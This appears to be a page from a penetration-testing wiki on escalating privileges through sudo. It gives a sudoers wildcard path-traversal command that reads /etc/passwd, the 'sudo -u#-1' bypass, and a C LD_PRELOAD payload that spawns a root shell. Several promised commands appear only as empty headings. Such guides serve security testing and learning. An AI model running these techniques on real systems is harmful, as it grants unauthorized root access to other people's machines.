Sudo Exploits

Wildcard redirection

If a rule inside the sudoers file includes an entry with a wildcard it is possible to redirect the execution to an arbitrary file.

ubuntu ALL= (root) /bin/nano /var/log/*

The wildcard can be used to access any file as follows

sudo nano /var/log/../../etc/passwd

Security bypass

Run the following command to execute a binary as root on Sudo version < 1.8.28

sudo -u#-1 <command>

LD_PRELOAD/LD_LIBRARY_PATH

To exploit this vulnerability one the following strings must be present as a result of sudo -l

env_keep+=LD_PRELOAD
env_keep+=LD_LIBRARY_PATH

To exploit the vulnerability create a simple payload as follows

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
        unsetenv("LD_PRELOAD or LD_LIBRARY_PATH");
        setgid(0);
        setuid(0);
        system("/bin/sh");
}

Compile the payload using GCC

Invoke sudo with the following parameters to execute the payload as root. The executed sudo command is not important, what really matters is to specify the path to the generated payload

Spawn elevated shell

The following commands allow to spawn an elevated shell from standard commands running with sudo

Automated discovery tools

Fall Of Sudo

Python based program that can aid in identifying misconfiurations and vulnerabilities in sudo. Can be found here.

SudoKiller

Tool that allows to identify a wide array of vulnerabilities and potential exploits works in both offline and online mode. Can be found here

Online mode

Offline mode

Run the following command to generate the offline data set on the target machine. The generate file will be stored under /tmp/sk_offline.txt

Execute the following command to start the offline analysis

PreviousWildcard ExploitsNextDocker Container

Last updated